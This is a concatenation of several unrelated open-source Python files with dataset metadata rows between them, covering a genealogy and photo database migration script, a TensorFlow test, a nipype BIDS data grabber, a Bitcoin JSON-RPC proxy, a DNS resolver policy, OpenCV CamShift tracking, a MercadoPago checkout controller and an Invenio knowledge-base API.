'collections_to_migrate', 'sql_db', 'photos_mount_point', 'movies_mount_point',
'gentree_mount_point', 'gentree_bucket_name', 'photos_bucket_name', 'movies_bucket_name'))
sqlClient = MigrationSQLClient(conf.sql_server, conf.sql_user, conf.sql_password, conf.sql_db)
logging.basicConfig(level=logging.INFO,
format='%(asctime)-15s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
logger = logging.getLogger('scripts.migrate')
logger.setLevel(logging.getLevelName('INFO'))
repeated_slugs = {'He': {}, 'En': {}}
split = lambda x: re.split(',|\||;| ', x)
def parse_args():
parser = ArgumentParser()
parser.add_argument('-c', '--collection')
parser.add_argument('--host', default='localhost')
parser.add_argument('-s', '--since', default=0)
parser.add_argument('-u', '--until', default=calendar.timegm(time.localtime()))
parser.add_argument('-i', '--unitid', type=int,
help='migrate a specifc unit/tree id')
parser.add_argument('-g', '--gedcom_path',
help='file path to a gedcom file. works only when -i XXX -c genTrees is used')
parser.add_argument('--lasthours',
help="migrate all content changed in the last LASTHOURS")
parser.add_argument('--dryrun', help="don't update data, just print what will be done")
return parser.parse_args()
def get_now_str():
format = '%d.%h-%H:%M:%S'
now = datetime.datetime.now()
now_str = datetime.datetime.strftime(now, format)
return now_str
def get_queries(collection_name=None, repo_path=conf.queries_repo_path):
''' return a dictionary with values of MSSQL query template and filenames
keys.
:param collection_name: the name of the collection, if False or missing
return the queries for all the collections
:param repo_path: where all the files are. defaults to the value from
the conf file
'''
queries = {}
if repo_path[-1] != '/':
repo_path = repo_path + '/'
if collection_name:
filenames = [collection_name + '.sql']
else:
# No single collection specified, migrating all the collections from conf
filenames = [col_name + '.sql' for col_name in conf.collections_to_migrate]
for filename in filenames:
try:
fh = open(os.path.join(repo_path, filename))
except IOError:
logger.error('Could not open file \'{}\' in {}.'.format(filename,
os.getcwd())
)
sys.exit(1)
queries[filename[:-4]] = fh.read()
fh.close()
return queries
def make_array(val, to_int=False):
''' make an array from a string of values separated by ',', '|' or ' ' '''
if val == None:
return []
else:
if not to_int:
return split(val[:-1])
else:
try:
return [int(x) for x in split(val[:-1])]
except ValueError:
logger.error('Value error while converting {}'.format(val))
return []
def make_subdocument_array(doc_arr, key, val_string):
returned_arr = doc_arr
if val_string == None:
return returned_arr
elif len(val_string) > 10000:
doc_id = None
logger.error('Given string is too long for {}!'.format(doc_id))
return returned_arr
sub_values = make_array(val_string)
for i in range(len(sub_values)):
val = sub_values[i]
if i >= len(returned_arr):
returned_arr.append({})
if is_lang_aware_key(key):
lang_prefix = key[:2]
lang_agnostic_key = key[2:]
if lang_agnostic_key in returned_arr[i]:
returned_arr[i][lang_agnostic_key][lang_prefix] = val
else:
doc = {}
doc[lang_prefix] = val
returned_arr[i][lang_agnostic_key] = doc
else:
returned_arr[i][key] = val
return returned_arr
def is_lang_aware_key(key):
lang_prefix = key[:2]
if lang_prefix == 'He' or lang_prefix == 'En':
return True
return False
def parse_common(doc):
parsed_doc = {}
parsed_doc['Attachments'] = []
parsed_doc['UnitPlaces'] = []
parsed_doc['Pictures'] = []
for key, val in doc.items():
if isinstance(val, Decimal):
parsed_doc[key] = float(val)
continue
elif isinstance(val, str):
try:
parsed_doc[key] = val.decode('utf-8')
except UnicodeDecodeError:
try:
if key == 'TS':
parsed_doc[key] = val.encode('hex')
continue
except:
logger.warning('failed to migrate key: %s' % key)
except:
logger.warning('failed to migrate key: %s' % key)
if key == 'LexiconIds':
parsed_doc[key] = make_array(val)
elif key in ('AttachmentFileName', 'AttachmentPath', 'AttachmentNum'):
parsed_doc['Attachments'] = make_subdocument_array(
parsed_doc['Attachments'], key, val)
elif key in ('PlaceIds', 'PlaceTypeCodes', 'EnPlaceTypeCodesDesc',
'HePlaceTypeCodesDesc'):
parsed_doc['UnitPlaces'] = make_subdocument_array(
parsed_doc['UnitPlaces'], key, val)
elif key in ('PictureId', 'IsPreview'):
parsed_doc['Pictures'] = make_subdocument_array(
parsed_doc['Pictures'], key, val)
elif is_lang_aware_key(key):
lang_prefix = key[:2]
lang_agnostic_key = key[2:]
if lang_agnostic_key in parsed_doc:
try:
parsed_doc[lang_agnostic_key][lang_prefix] = val
except:
d = {}
d[lang_prefix] = val
parsed_doc[lang_agnostic_key] = d
else:
d = {}
d[lang_prefix] = val
parsed_doc[lang_agnostic_key] = d
else:
parsed_doc[key] = val
return parsed_doc
def parse_image_unit(doc):
image_unit_doc = parse_common(doc)
image_unit_doc['PreviewPics'] = []
image_unit_doc['UnitPersonalities'] = []
image_unit_doc['UnitPeriod'] = []
image_unit_doc['Exhibitions'] = []
if not image_unit_doc.has_key('Pictures'):
image_unit_doc['Pictures'] = []
for key, val in doc.items():
if key in ('IsPreviewPreview', 'PrevPictureId'):
image_unit_doc['PreviewPics'] = make_subdocument_array(image_unit_doc['PreviewPics'], key, val)
elif key in ('PersonalityId', 'PersonalityType', 'EnPersonalityTypeDesc', 'HePersonalityTypeDesc', 'PerformerType', 'EnPerformerTypeDesc', 'HePerformerTypeDesc', 'OrderBy'):
image_unit_doc['UnitPersonalities'] = make_subdocument_array(image_unit_doc['UnitPersonalities'], key, val)
elif key in ('PicId', 'OldPictureNumber', 'PictureTypeCode', 'EnPictureTypeDesc', 'HePictureTypeDesc', 'Resolution', 'NegativeNumber', 'PictureLocation', 'LocationCode', 'ToScan', 'ForDisplay', 'IsLandscape'):
image_unit_doc['Pictures'] = make_subdocument_array(image_unit_doc['Pictures'], key, val)
elif key in ('PeriodNum', 'PeriodTypeCode', 'EnPeriodTypeDesc', 'HePeriodTypeDesc', 'PeriodDateTypeCode', 'EnPeriodDateTypeDesc', 'HePeriodDateTypeDesc', 'PeriodStartDate', 'PeriodEndDate', 'EnPeriodDesc', 'HePeriodDesc'):
image_unit_doc['UnitPeriod'] = make_subdocument_array(image_unit_doc['UnitPeriod'], key, val)
elif key in ('ExhibitionId', 'ExhibitionIsPreview'):
image_unit_doc['Exhibitions'] = make_subdocument_array(image_unit_doc['Exhibitions'], key, val)
elif key in ('AttachmentFileName', 'AttachmentPath', 'AttachmentNum'):
image_unit_doc['Attachments'] = make_subdocument_array(image_unit_doc['Attachments'], key, val)
elif key in ('SourceIds', 'PIctureReceived'):
# REALLY PIctureReceived?!
image_unit_doc[key] = make_array(val)
return image_unit_doc
def parse_image(doc):
image_doc = doc.copy()
# create thumbnail and attach to document
thumb_binary = create_thumb(image_doc, conf.photos_mount_point)
if thumb_binary:
image_doc['bin'] = thumb_binary
return image_doc
def parse_person(doc):
indi_doc = {}
for key, val in doc.items():
if key in ('BIRT_PLAC', 'MARR_PLAC', 'DEAT_PLAC'):
indi_doc[key] = val
if val:
indi_doc[key + '_lc'] = val.lower()
else:
indi_doc[key + '_lc'] = val
elif key in ['MSD', 'MED']:
indi_doc[key] = make_array(val, to_int=True)
elif key =='name':
indi_doc[key] = val
indi_doc['name_lc'] = map(unicode.lower, val)
indi_doc['name_S'] = map(phonetic.get_bhp_soundex, val)
else:
indi_doc[key] = val
if key in ('BIRT_PLAC', 'MARR_PLAC', 'DEAT_PLAC'):
indi_doc[key + '_S'] = phonetic.get_bhp_soundex(val)
return indi_doc
def parse_identity(doc):
return doc
def parse_synonym(doc):
parsed = {}
parsed['_id'] = doc['SynonymKey']
if doc['LanguageCode'] == 0:
parsed['lang'] = 'En'
else:
parsed['lang'] = 'He'
parsed['s_group'] = doc['Num']
parsed['str'] = doc['Synonym']
parsed['str_lc'] = doc['Synonym'].lower()
return parsed
def parse_doc(doc, collection_name):
collection_procedure_map = {
'places': parse_common,
'familyNames': parse_common,
'lexicon': parse_common,
'photoUnits': parse_image_unit,
'photos': parse_image,
'persons': parse_person,
'synonyms': parse_synonym,
'personalities': parse_common,
'movies': parse_common,
}
return collection_procedure_map[collection_name](doc)
def parse_n_update(row, collection_name, dryrun=False):
doc = parse_doc(row, collection_name)
id_field = get_collection_id_field(collection_name)
logger.info('{}:Updating {}: {}, updated {}'.format(
collection_name, id_field, doc[id_field],
doc.get('UpdateDate', '?')))
if not dryrun:
update_row.delay(doc, collection_name)
return doc
def get_file_descriptors(tree, gedcom_path):
''' returns both the file_id and the full file name of the gedcom file '''
if not gedcom_path:
gedcom_path = tree['GenTreePath']
file_id = os.path.split(gedcom_path)[-1].split('.')[0]
file_name = os.path.join(conf.gentree_mount_point,
gedcom_path)
return file_id, file_name
def migrate_trees(cursor, only_process_treenum=None, gedcom_path=None, on_save=None, dryrun=False):
''' get command line arguments and sql query and initiated update_tree
and update_row celery tasks.
returns how many people migrated
'''
collection_name = "persons"
row_number = 0
filtered_rows = filter(lambda row: not only_process_treenum or row['GenTreeNumber'] == only_process_treenum, cursor)
for row_number, row in enumerate(filtered_rows, start=1):
file_id, file_name = get_file_descriptors(row, gedcom_path)
try:
gedcom_fd = open(file_name)
except IOError, e:
logger.error('failed to open gedocm file tree number {}, path {}: {}'.format(row['GenTreeNumber'], file_name, str(e)))
else:
try:
g = Gedcom(fd=gedcom_fd)
except (SyntaxError, GedcomParseError) as e:
logger.error('failed to parse tree number {}, path {}: {}'.format(row['GenTreeNumber'], file_name, str(e)))
else:
logger.info('>>> migrating tree {}, path {}'.format(row['GenTreeNumber'], file_name))
if on_save and dryrun:
raise Exception("dryrun is not supported with on_save")
else:
on_save = partial(parse_n_update, collection_name=collection_name, dryrun=dryrun) if not on_save else on_save
Gedcom2Persons(g, row['GenTreeNumber'], file_id, on_save)
logger.info('<<< migrated tree {}, path {}'.format(row['GenTreeNumber'], file_name))
return row_number
if __name__ == '__main__':
args = parse_args()
until = int(args.until)
since_file = None
if not args.since:
if args.lasthours:
past = datetime.datetime.now() -\
datetime.timedelta(hours=int(args.lasthours))
since = calendar.timegm(past.timetuple())
else:
try:
since_file = open('/var/run/bhs/last_update', 'r+')
since = since_file.read()
since = int(since) + 1
except IOError:
since_file = None
since = 0
else:
since = int(args.since)
collection = args.collection
queries = get_queries(collection)
logger.info('looking for changed items in {}-{}'.format(since, until))
photos_to_update = []
for collection_name, query in queries.items():
if collection_name == 'genTrees':
# the family trees get special treatment
# TODO: don't give them special treatment..
# this is called "persons" collection in mongo / ES
# TODO: have all places refer to it as "persons" instead of variations on genTrees / ftrees etc..
tree_nums = [args.unitid] if args.unitid else None
sql_cursor = sqlClient.execute(query, since=since, until=until)
count = migrate_trees(sql_cursor, args.unitid, args.gedcom_path, dryrun=args.dryrun)
if not count:
logger.info('{}:Skipping'.format(collection_name))
else:
if args.unitid:
sql_cursor = sqlClient.execute(query, unit_ids=[args.unitid])
else:
sql_cursor = sqlClient.execute(query, since=since, until=until)
if sql_cursor:
for row in sql_cursor:
doc = parse_n_update(row, collection_name, dryrun=args.dryrun)
# collect all the photos
pictures = doc.get('Pictures', None)
if pictures:
for pic in pictures:
if 'PictureId' in pic:
photos_to_update.append(pic['PictureId'])
else:
logger.warn('failed getting updated units {}:{}'
.format(collection_name, ','.join(units)))
# TODO:
# rsync_media(collection_name)
# update photos
if len(photos_to_update) > 0:
photos_query = get_queries('photos')['photos']
photos_cursor = sqlClient.execute(photos_query,
unit_ids=photos_to_update,
)
for row in photos_cursor:
upload_photo(row, conf, dryrun=args.dryrun)
if since_file and not args.dryrun:
since_file.seek(0)
since_file.write(str(until))
since_file.close()
logger.info("closing sql connection...")
sqlClient.close_connections()
| agpl-3.0 | -3,581,223,935,101,060,000 | 38.26555 | 230 | 0.570767 | false | 3.824983 | false | false | false |
ppries/tensorflow | tensorflow/python/kernel_tests/large_concat_op_test.py | 1 | 1511 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for Concat Op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
class LargeConcatOpTest(tf.test.TestCase):
"""Tests that belong in concat_op_test.py, but run over large tensors."""
def testConcatLargeTensors(self):
# CPU-only test, because it fails on GPUs with <= 4GB memory.
with tf.device("/cpu:0"):
a = tf.ones([2**31 + 6], dtype=tf.int8)
b = tf.zeros([1024], dtype=tf.int8)
onezeros = tf.concat_v2([a, b], 0)
with self.test_session(use_gpu=False):
# TODO(dga): Add more depth to this test to validate correctness,
# not just non-crashingness, once other large tensor fixes have gone in.
_ = onezeros.eval()
if __name__ == "__main__":
tf.test.main()
| apache-2.0 | -2,734,721,287,931,328,500 | 37.74359 | 80 | 0.667108 | false | 3.89433 | true | false | false |
mick-d/nipype | nipype/interfaces/bids_utils.py | 3 | 5108 | # -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
""" Set of interfaces that allow interaction with BIDS data. Currently
available interfaces are:
BIDSDataGrabber: Query data from BIDS dataset using pybids grabbids.
Change directory to provide relative paths for doctests
>>> import os
>>> filepath = os.path.dirname( os.path.realpath( __file__ ) )
>>> datadir = os.path.realpath(os.path.join(filepath, '../testing/data'))
>>> os.chdir(datadir)
"""
from os.path import join, dirname
import json
from .. import logging
from .base import (traits,
DynamicTraitedSpec,
Directory,
BaseInterface,
isdefined,
Str,
Undefined)
have_pybids = True
try:
from bids import grabbids as gb
except ImportError:
have_pybids = False
LOGGER = logging.getLogger('workflows')
class BIDSDataGrabberInputSpec(DynamicTraitedSpec):
base_dir = Directory(exists=True,
desc='Path to BIDS Directory.',
mandatory=True)
output_query = traits.Dict(key_trait=Str,
value_trait=traits.Dict,
desc='Queries for outfield outputs')
raise_on_empty = traits.Bool(True, usedefault=True,
desc='Generate exception if list is empty '
'for a given field')
return_type = traits.Enum('file', 'namedtuple', usedefault=True)
class BIDSDataGrabber(BaseInterface):
""" BIDS datagrabber module that wraps around pybids to allow arbitrary
querying of BIDS datasets.
Examples
--------
By default, the BIDSDataGrabber fetches anatomical and functional images
from a project, and makes BIDS entities (e.g. subject) available for
filtering outputs.
>>> bg = BIDSDataGrabber()
>>> bg.inputs.base_dir = 'ds005/'
>>> bg.inputs.subject = '01'
>>> results = bg.run() # doctest: +SKIP
Dynamically created, user-defined output fields can also be defined to
return different types of outputs from the same project. All outputs
are filtered on common entities, which can be explicitly defined as
infields.
>>> bg = BIDSDataGrabber(infields = ['subject'], outfields = ['dwi'])
>>> bg.inputs.base_dir = 'ds005/'
>>> bg.inputs.subject = '01'
>>> bg.inputs.output_query['dwi'] = dict(modality='dwi')
>>> results = bg.run() # doctest: +SKIP
"""
input_spec = BIDSDataGrabberInputSpec
output_spec = DynamicTraitedSpec
_always_run = True
def __init__(self, infields=None, **kwargs):
"""
Parameters
----------
infields : list of str
Indicates the input fields to be dynamically created
outfields: list of str
Indicates output fields to be dynamically created.
If no matching items, returns Undefined.
"""
super(BIDSDataGrabber, self).__init__(**kwargs)
if not isdefined(self.inputs.output_query):
self.inputs.output_query = {"func": {"modality": "func"},
"anat": {"modality": "anat"}}
# If infields is empty, use all BIDS entities
if not infields is None and have_pybids:
bids_config = join(dirname(gb.__file__), 'config', 'bids.json')
bids_config = json.load(open(bids_config, 'r'))
infields = [i['name'] for i in bids_config['entities']]
self._infields = infields or []
# used for mandatory inputs check
undefined_traits = {}
for key in self._infields:
self.inputs.add_trait(key, traits.Any)
undefined_traits[key] = kwargs[key] if key in kwargs else Undefined
self.inputs.trait_set(trait_change_notify=False, **undefined_traits)
def _run_interface(self, runtime):
if not have_pybids:
raise ImportError(
"The BIDSEventsGrabber interface requires pybids."
" Please make sure it is installed.")
return runtime
def _list_outputs(self):
layout = gb.BIDSLayout(self.inputs.base_dir)
# If infield is not given nm input value, silently ignore
filters = {}
for key in self._infields:
value = getattr(self.inputs, key)
if isdefined(value):
filters[key] = value
outputs = {}
for key, query in self.inputs.output_query.items():
args = query.copy()
args.update(filters)
filelist = layout.get(return_type=self.inputs.return_type, **args)
if len(filelist) == 0:
msg = 'Output key: %s returned no files' % key
if self.inputs.raise_on_empty:
raise IOError(msg)
else:
LOGGER.warning(msg)
filelist = Undefined
outputs[key] = filelist
return outputs
| bsd-3-clause | -78,829,929,764,361,940 | 33.748299 | 79 | 0.584573 | false | 4.149472 | false | false | false |
bool-/btcbot | jsonrpc/authproxy.py | 1 | 3903 |
"""
Copyright 2011 Jeff Garzik
AuthServiceProxy has the following improvements over python-jsonrpc's
ServiceProxy class:
- HTTP connections persist for the life of the AuthServiceProxy object
(if server supports HTTP/1.1)
- sends protocol 'version', per JSON-RPC 1.1
- sends proper, incrementing 'id'
- sends Basic HTTP authentication headers
- parses all JSON numbers that look like floats as Decimal
- uses standard Python json lib
Previous copyright, from python-jsonrpc/jsonrpc/proxy.py:
Copyright (c) 2007 Jan-Klaas Kollhof
This file is part of jsonrpc.
jsonrpc is free software; you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 2.1 of the License, or
(at your option) any later version.
This software is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this software; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
try:
import http.client as httplib
except ImportError:
import httplib
import base64
import json
import decimal
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
USER_AGENT = "AuthServiceProxy/0.1"
HTTP_TIMEOUT = 30
class JSONRPCException(Exception):
def __init__(self, rpcError):
Exception.__init__(self)
self.error = rpcError
class AuthServiceProxy(object):
def __init__(self, serviceURL, serviceName=None):
self.__serviceURL = serviceURL
self.__serviceName = serviceName
self.__url = urlparse.urlparse(serviceURL)
if self.__url.port is None:
port = 80
else:
port = self.__url.port
self.__idcnt = 0
authpair = "%s:%s" % (self.__url.username, self.__url.password)
authpair = authpair.encode('utf8')
self.__authhdr = "Basic ".encode('utf8') + base64.b64encode(authpair)
if self.__url.scheme == 'https':
self.__conn = httplib.HTTPSConnection(self.__url.hostname, port, None, None,False,
HTTP_TIMEOUT)
else:
self.__conn = httplib.HTTPConnection(self.__url.hostname, port, False,
HTTP_TIMEOUT)
def __getattr__(self, name):
if self.__serviceName != None:
name = "%s.%s" % (self.__serviceName, name)
return AuthServiceProxy(self.__serviceURL, name)
def __call__(self, *args):
self.__idcnt += 1
postdata = json.dumps({
'version': '1.1',
'method': self.__serviceName,
'params': args,
'id': self.__idcnt})
self.__conn.request('POST', self.__url.path, postdata,
{ 'Host' : self.__url.hostname,
'User-Agent' : USER_AGENT,
'Authorization' : self.__authhdr,
'Content-type' : 'application/json' })
httpresp = self.__conn.getresponse()
if httpresp is None:
raise JSONRPCException({
'code' : -342, 'message' : 'missing HTTP response from server'})
resp = httpresp.read()
resp = resp.decode('utf8')
resp = json.loads(resp)
if resp['error'] != None:
raise JSONRPCException(resp['error'])
elif 'result' not in resp:
raise JSONRPCException({
'code' : -343, 'message' : 'missing JSON-RPC result'})
else:
return resp['result']
| gpl-3.0 | 3,396,568,396,845,373,400 | 33.539823 | 94 | 0.607994 | false | 4.279605 | false | false | false |
account-login/dnsagent | dnsagent/resolver/dual.py | 1 | 1713 | from typing import Mapping, Union, Sequence
from twisted.names.error import ResolverError
from twisted.python.failure import Failure
from dnsagent.resolver.cn import CnResolver
from dnsagent.resolver.parallel import PoliciedParallelResolver, BaseParalledResolverPolicy
__all__ = ('DualResolver',)
class PolicyError(ResolverError):
pass
class NoSuchRule(PolicyError):
pass
class SuccessFailStatePolicy(BaseParalledResolverPolicy):
SUCC = 'S'
FAIL = 'F'
WAIT = 'W'
def __init__(self, rules: Mapping[Sequence[str], Union[str, int]]):
super().__init__()
self.rules = rules
def _convert(self, result):
if result is None:
return self.WAIT
elif isinstance(result, Failure):
return self.FAIL
else:
return self.SUCC
def for_results(self, results: Sequence):
states = tuple(self._convert(x) for x in results)
try:
action = self.rules[states]
except KeyError:
raise NoSuchRule(states)
if action == self.FAIL:
raise PolicyError
elif action == self.WAIT:
return None
else:
assert isinstance(action, int)
return action
_cn_ab_policy = SuccessFailStatePolicy({
# Cn Ab
('W', 'W'): 'W',
('W', 'S'): 'W',
('W', 'F'): 'W',
('S', 'W'): 0,
('S', 'S'): 0,
('S', 'F'): 0,
('F', 'W'): 'W',
('F', 'S'): 1,
('F', 'F'): 'F',
})
class DualResolver(PoliciedParallelResolver):
def __init__(self, cn_resolver, ab_resolver, policy=_cn_ab_policy):
resolvers = [ CnResolver(cn_resolver), ab_resolver ]
super().__init__(resolvers, policy)
| mit | -6,318,335,503,835,662,000 | 23.126761 | 91 | 0.582604 | false | 3.69181 | false | false | false |
jzinner/utils | samples/python_samples/filewalk.py | 1 | 1158 | #/usr/bin/python
# import os for the os.walk() function
# os.walk returns a list of tuples: 3-tuple (dirpath, dirnames, filenames)
import os
import sys
def ParseArgs():
Error1 = """ # USAGE #
# filesystemWalk.py [directory]
# filesystemWalk.py /Users/mcohoon/Devel/PythonPractice """
if len(sys.argv) != 2:
print Error1
elif not os.path.abspath(sys.argv[1]):
print Error1
else:
start = sys.argv[1]
filesystemWalk(start)
def filesystemWalk(start):
path = os.path.abspath(start)
print "path = " +path
for dirpath, dirnames, filenames in os.walk(path):
print "Found the initial directory " + dirpath
for file in filenames:
print "Found the file ", os.path.join(dirpath, file)
for dir in dirnames:
print "Found the directory ", os.path.join(dirpath, dir)
ParseArgs()
#start = "/Users/mcohoon/Devel/PythonPractice"
#start = "."
#filesystemWalk(start)
#os.path to take a string and make it into a full directory path
#os.walk gives you the path to the directory as the first value in the loop
#use os.path.join() to create full filename:
| mit | -6,329,629,763,930,400,000 | 28.692308 | 75 | 0.659758 | false | 3.487952 | false | false | false |
sciencefreak500/Open_Intelligence | Python/Eyesight/camshift_test.py | 1 | 1347 | import numpy as np
import cv2
cap = cv2.VideoCapture(0)
# take first frame of the video
ret,frame = cap.read()
# setup initial location of window
r,h,c,w = 250,90,400,125 # simply hardcoded the values
track_window = (c,r,w,h)
# set up the ROI for tracking
roi = frame[r:r+h, c:c+w]
hsv_roi = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv_roi, np.array((0., 60.,32.)), np.array((180.,255.,255.)))
roi_hist = cv2.calcHist([hsv_roi],[0],mask,[180],[0,180])
cv2.normalize(roi_hist,roi_hist,0,255,cv2.NORM_MINMAX)
# Setup the termination criteria, either 10 iteration or move by atleast 1 pt
term_crit = ( cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 1 )
while(1):
ret ,frame = cap.read()
if ret == True:
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
dst = cv2.calcBackProject([hsv],[0],roi_hist,[0,180],1)
# apply meanshift to get the new location
ret, track_window = cv2.CamShift(dst, track_window, term_crit)
# Draw it on image
pts = cv2.boxPoints(ret)
pts = np.int0(pts)
img2 = cv2.polylines(frame,[pts],True, 255,2)
cv2.imshow('img2',dst)
k = cv2.waitKey(60) & 0xff
if k == 27:
break
else:
cv2.imwrite(chr(k)+".jpg",img2)
else:
break
cv2.destroyAllWindows()
cap.release()
| gpl-2.0 | -696,926,444,738,673,900 | 26.489796 | 80 | 0.620638 | false | 2.699399 | false | false | false |
reingart/suscripciones | controllers/checkout.py | 1 | 1037 | # coding: utf8
# try something like
def index():
form = SQLFORM.factory(
Field("descripcion", "string", default="Barrilete multicolor"),
Field("cantidad", "integer", default=1),
Field("precio", "float", default=1.00),
)
if form.accepts(request.vars, session):
preference_data = {
"items": [
{
"title": form.vars.descripcion,
"quantity": int(form.vars.cantidad),
"currency_id": "ARS",
"unit_price": float(form.vars.precio),
}
]
}
preference = mp.create_preference(preference_data)
#return str(preference)
return """<!DOCTYPE html>
<html>
<head>
<title>Pagar</title>
</head>
<body>
<a href="%s">Pagar</a>
</body>
</html>""" % preference['response']['init_point']
else:
response.view = "generic.html"
return {'form': form}
| agpl-3.0 | -8,104,248,428,180,297,000 | 27.027027 | 71 | 0.47541 | false | 4.035019 | false | false | false |
egabancho/invenio | invenio/modules/knowledge/api.py | 1 | 26116 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2009, 2010, 2011, 2013, 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Provide API-callable functions for knowledge base management."""
import json
import os
import re
import warnings
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm.exc import NoResultFound
from invenio.base.globals import cfg
from invenio.ext.sqlalchemy import db
from invenio.ext.sqlalchemy.utils import session_manager
from invenio.modules.search.models import Collection
from invenio.utils.memoise import Memoise
from . import models
processor_type = 0
try:
from lxml import etree
processor_type = 1
except ImportError:
try:
import libxml2
import libxslt
processor_type = 2
except ImportError:
pass
def get_kb_by_id(kb_id):
"""Return the knwKB object with given id.
:raises: :exc:`~sqlalchemy.orm.exc.NoResultFound` in case not exist.
"""
return models.KnwKB.query.filter_by(id=kb_id).one()
def get_kb_id(kb_name):
"""Get the id by name.
:param kb_name: knowledge base name
"""
warnings.warn("The method get_kb_id(kb_name) is deprecated! "
"Use instead get_kb_by_id()'",
DeprecationWarning)
return get_kb_by_id(kb_name).id
def get_kb_by_name(kb_name):
"""Return the knwKB object with given name.
:raises: :exc:`~sqlalchemy.orm.exc.NoResultFound` in case not exist.
"""
return models.KnwKB.query.filter_by(name=kb_name).one()
def get_all_kb_names():
"""Return all knowledge base names.
:return: list of names
"""
return [row.name for row in models.KnwKB.query.all()]
get_kb_by_name_memoised = Memoise(get_kb_by_name)
def query_kb_mappings(kbid, sortby="to", key="", value="",
match_type="s"):
"""Return a list of all mappings from the given kb, ordered by key.
If key given, give only those with left side (mapFrom) = key.
If value given, give only those with right side (mapTo) = value.
:param kb_name: knowledge base name. if "", return all
:param sortby: the sorting criteria ('from' or 'to')
:param key: return only entries where key matches this
:param value: return only entries where value matches this
:param match_type: s=substring, e=exact, sw=startswith
"""
return models.KnwKBRVAL.query_kb_mappings(kbid, sortby, key,
value, match_type)
def get_kb_mappings(kb_name="", key="", value="", match_type="s", sortby="to",
limit=None):
"""Return a list of all mappings from the given kb, ordered by key.
If key given, give only those with left side (mapFrom) = key.
If value given, give only those with right side (mapTo) = value.
:param kb_name: knowledge base name. if "", return all
:param sortby: the sorting criteria ('from' or 'to')
:param key: return only entries where key matches this
:param value: return only entries where value matches this
:limit return only X number of entries
"""
# query
query = db.session.query(models.KnwKBRVAL).join(models.KnwKB)
# filter
if kb_name:
query = query.filter(models.KnwKB.name == kb_name)
if len(key) > 0:
if match_type == "s":
key = "%"+key+"%"
else:
key = '%'
if len(value) > 0:
if match_type == "s":
value = "%"+value+"%"
else:
value = '%'
query = query.filter(
models.KnwKBRVAL.m_key.like(key),
models.KnwKBRVAL.m_value.like(value))
# order by
if sortby == "from":
query = query.order_by(models.KnwKBRVAL.m_key)
else:
query = query.order_by(models.KnwKBRVAL.m_value)
if limit:
query = query.limit(limit)
# return results
return [kbv.to_dict() for (kbv) in query.all()]
def get_kb_mapping(kb_name="", key="", value="", match_type="e", default="",
limit=None):
"""Get one unique mapping. If not found, return default.
:param kb_name: the name of the kb
:param key: include only lines matching this on left side in the results
:param value: include only lines matching this on right side in the results
:param match_type: s = substring match, e = exact match
:param default: default value if no mapping is found
:return: a mapping
"""
mappings = get_kb_mappings(kb_name, key=key, value=value,
match_type=match_type, limit=limit)
if len(mappings) == 0:
return default
else:
return mappings[0]
@session_manager
def add_kb_mapping(kb_name, key, value=""):
"""Add a new mapping to given kb.
:param kb_name: the name of the kb where to insert the new value
:param key: the key of the mapping
:param value: the value of the mapping
"""
kb = get_kb_by_name(kb_name)
if key in kb.kbrvals:
# update
kb.kbrvals[key].m_value = value
else:
# insert
kb.kbrvals.set(models.KnwKBRVAL(m_key=key, m_value=value))
@session_manager
def remove_kb_mapping(kb_name, key):
"""Delete an existing kb mapping in kb.
:param kb_name: the name of the kb where to insert the new value
:param key: the key of the mapping
"""
kb = get_kb_by_name(kb_name)
del kb.kbrvals[key]
def update_kb_mapping(kb_name, old_key, key, value):
"""Update an existing kb mapping with key old_key with a new key and value.
:param kb_name: the name of the kb where to insert the new value
:param old_key: the key of the mapping in the kb
:param key: the new key of the mapping
:param value: the new value of the mapping
"""
db.session.query(models.KnwKBRVAL).join(models.KnwKB) \
.filter(models.KnwKB.name == kb_name,
models.KnwKBRVAL.m_key == old_key) \
.update({"m_key": key, "m_value": value})
def get_kb_mappings_json(kb_name="", key="", value="", match_type="s",
limit=None):
"""Get leftside/rightside mappings from kb kb_name formatted as json dict.
If key given, give only those with left side (mapFrom) = key.
If value given, give only those with right side (mapTo) = value.
:param kb_name: the name of the kb
:param key: include only lines matching this on left side in the results
:param value: include only lines matching this on right side in the results
:param match_type: s = substring match, e = exact match
:param limit: maximum number of results to return (are ALL if set to None)
:return: a list of mappings
"""
mappings = get_kb_mappings(kb_name, key, value, match_type)
ret = []
if limit is None:
limit = len(mappings)
for m in mappings[:limit]:
label = m['value'] or m['key']
value = m['key'] or m['value']
ret.append({'label': label, 'value': value})
